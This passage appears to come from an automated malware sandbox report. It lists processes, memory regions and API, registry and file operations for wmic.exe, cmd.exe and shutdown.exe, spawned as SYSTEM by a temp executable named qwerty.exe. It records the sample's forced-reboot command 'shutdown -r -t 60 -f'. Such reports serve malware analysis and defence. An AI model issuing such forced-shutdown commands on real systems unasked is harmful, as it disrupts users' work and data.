Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs 0x7A0, 0x434, 0x11C, 0x640, 0x424
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x0003ffff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e6fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f1fff Pagefile Backed Memory Readable, Writable True False False -
wmic.exe.mui 0x00100000 0x0010ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000130000 0x00130000 0x00130fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory Readable True False False -
msxml3r.dll 0x00150000 0x00150fff Memory Mapped File Readable False False False -
pagefile_0x0000000000160000 0x00160000 0x00161fff Pagefile Backed Memory Readable True False False -
private_0x0000000000170000 0x00170000 0x001affff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x001cffff Private Memory - True False False -
windowsshell.manifest 0x001d0000 0x001d0fff Memory Mapped File Readable False False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable True False False -
index.dat 0x001f0000 0x001fbfff Memory Mapped File Readable, Writable True False False -
index.dat 0x00200000 0x00207fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00210000 0x0021ffff Memory Mapped File Readable, Writable True False False -
rsaenh.dll 0x00220000 0x0025bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000220000 0x00220000 0x0022cfff Pagefile Backed Memory Readable, Writable True False False -
wmiutils.dll.mui 0x00220000 0x00224fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000260000 0x00260000 0x0029ffff Private Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x0030ffff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0036ffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x0043ffff Private Memory Readable, Writable True False False -
private_0x0000000000440000 0x00440000 0x004fffff Private Memory Readable, Writable True False False -
private_0x0000000000450000 0x00450000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x00000000004c0000 0x004c0000 0x004fffff Private Memory Readable, Writable True False False -
private_0x0000000000510000 0x00510000 0x0054ffff Private Memory Readable, Writable True False False -
private_0x0000000000560000 0x00560000 0x0065ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000660000 0x00660000 0x007e7fff Pagefile Backed Memory Readable True False False -
private_0x00000000007f0000 0x007f0000 0x008affff Private Memory Readable, Writable True False False -
private_0x0000000000810000 0x00810000 0x0084ffff Private Memory Readable, Writable True False False -
private_0x0000000000870000 0x00870000 0x008affff Private Memory Readable, Writable True False False -
private_0x00000000008d0000 0x008d0000 0x0090ffff Private Memory Readable, Writable True False False -
wmic.exe 0x00930000 0x00992fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x00000000009a0000 0x009a0000 0x00b20fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000b30000 0x00b30000 0x01f2ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001f30000 0x01f30000 0x0211ffff Private Memory Readable, Writable True False False -
private_0x0000000001f30000 0x01f30000 0x020cffff Private Memory Readable, Writable True False False -
private_0x0000000001f30000 0x01f30000 0x0205ffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x01f30000 0x01feffff Memory Mapped File Readable, Writable False False False -
private_0x0000000002020000 0x02020000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000002090000 0x02090000 0x020cffff Private Memory Readable, Writable True False False -
private_0x00000000020e0000 0x020e0000 0x0211ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02120000 0x023eefff Memory Mapped File Readable False False False -
private_0x00000000023f0000 0x023f0000 0x025effff Private Memory Readable, Writable True False False -
private_0x00000000023f0000 0x023f0000 0x024effff Private Memory Readable, Writable True False False -
private_0x00000000025b0000 0x025b0000 0x025effff Private Memory Readable, Writable True False False -
private_0x00000000025f0000 0x025f0000 0x029effff Private Memory Readable, Writable True False False -
private_0x00000000029f0000 0x029f0000 0x02bcffff Private Memory Readable, Writable True False False -
pagefile_0x00000000029f0000 0x029f0000 0x02acefff Pagefile Backed Memory Readable True False False -
private_0x0000000002ae0000 0x02ae0000 0x02b1ffff Private Memory Readable, Writable True False False -
private_0x0000000002b40000 0x02b40000 0x02b7ffff Private Memory Readable, Writable True False False -
private_0x0000000002b90000 0x02b90000 0x02bcffff Private Memory Readable, Writable True False False -
private_0x0000000002c80000 0x02c80000 0x02cbffff Private Memory Readable, Writable True False False -
wmiutils.dll 0x73c50000 0x73c66fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x73cc0000 0x73d55fff Memory Mapped File Readable, Writable, Executable False False False -
msxml3.dll 0x73e60000 0x73f92fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x73fa0000 0x73ffbfff Memory Mapped File Readable, Writable, Executable False False False -
ntdsapi.dll 0x74240000 0x74257fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x74260000 0x7426efff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x74280000 0x74289fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x74290000 0x74297fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x742a0000 0x742acfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x742b0000 0x742e4fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74430000 0x7443dfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74920000 0x7495afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74960000 0x74975fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a60000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74a70000 0x74a8bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74a90000 0x74ad3fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x767a0000 0x76822fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x7a0
21 0
Category Operation Information Success Count
System Get Time type = System Time, time = 2018-06-04 08:52:32 (UTC) True 1
System Get Time type = Ticks, time = 152288 True 1
Module Get Handle module_name = c:\windows\syswow64\wbem\wmic.exe, base_address = 0x930000 True 1
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Module Load module_name = C:\Windows\system32\kernel32.dll, base_address = 0x74cb0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x74cda84f True 1
System Get Computer Name result_out = YKYD69Q True 1
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 True 1
COM Create interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER True 1
System Get Time type = Local Time, time = 2018-06-04 08:52:34 (Local Time) True 1
COM Create interface = EB87E1BC-3233-11D2-AEC9-00C04FB68820, cls_context = CLSCTX_INPROC_SERVER True 1
Process #9: cmd.exe
57 0
Information Value
ID #9
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:37, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:43
OS Process Information
Information Value
PID 0x66c
Parent PID 0xa44 (c:\users\aetadzjz\appdata\local\temp\qwerty.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs 0x900
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x00000000001c0000 0x001c0000 0x0023ffff Private Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x0038ffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x004fffff Private Memory Readable, Writable True False False -
private_0x00000000005e0000 0x005e0000 0x005effff Private Memory Readable, Writable True False False -
pagefile_0x00000000005f0000 0x005f0000 0x00777fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000780000 0x00780000 0x00900fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001d10000 0x01d10000 0x02052fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02060000 0x0232efff Memory Mapped File Readable False False False -
cmd.exe 0x4a930000 0x4a97bfff Memory Mapped File Readable, Writable, Executable True False False -
winbrand.dll 0x73a90000 0x73a96fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x900
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:52:35 (UTC) True 1
System Get Time type = Ticks, time = 154862 True 1
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a930000 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74cb0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x74cda84f True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
File Open filename = STD_OUTPUT_HANDLE True 3
File Open filename = STD_INPUT_HANDLE True 2
Environment Get Environment String - True 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Environment Get Environment String name = PROMPT False 1
Environment Set Environment String name = PROMPT, value = $P$G True 1
Environment Get Environment String - True 1
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Environment Get Environment String name = KEYS False 1
File Get Info filename = C:\Users\aETAdzjz\Desktop, type = file_attributes True 2
Environment Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Environment Get Environment String - True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74cb0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x74ce3b92 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x74cc4a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x74cda79d True 1
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Process Create process_name = C:\Windows\system32\shutdown.exe, os_pid = 0x8d8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Environment Set Environment String name = COPYCMD True 1
Environment Get Environment String - True 1
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Environment Get Environment String - True 1
Environment Set Environment String name = =ExitCodeAscii True 1
Environment Get Environment String - True 1
File Open filename = STD_OUTPUT_HANDLE True 2
File Open filename = STD_INPUT_HANDLE True 1
Process #10: shutdown.exe
Information Value
ID #10
File Name c:\windows\syswow64\shutdown.exe
Command Line shutdown -r -t 60 -f
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:37, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:43
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x8d8
Parent PID 0x66c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x8CC
0x8B0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
shutdown.exe 0x00180000 0x00189fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False -
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0047ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000480000 0x00480000 0x00607fff Pagefile Backed Memory Readable True False False -
private_0x0000000000670000 0x00670000 0x0076ffff Private Memory Readable, Writable True False False -
secur32.dll 0x74290000 0x74297fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
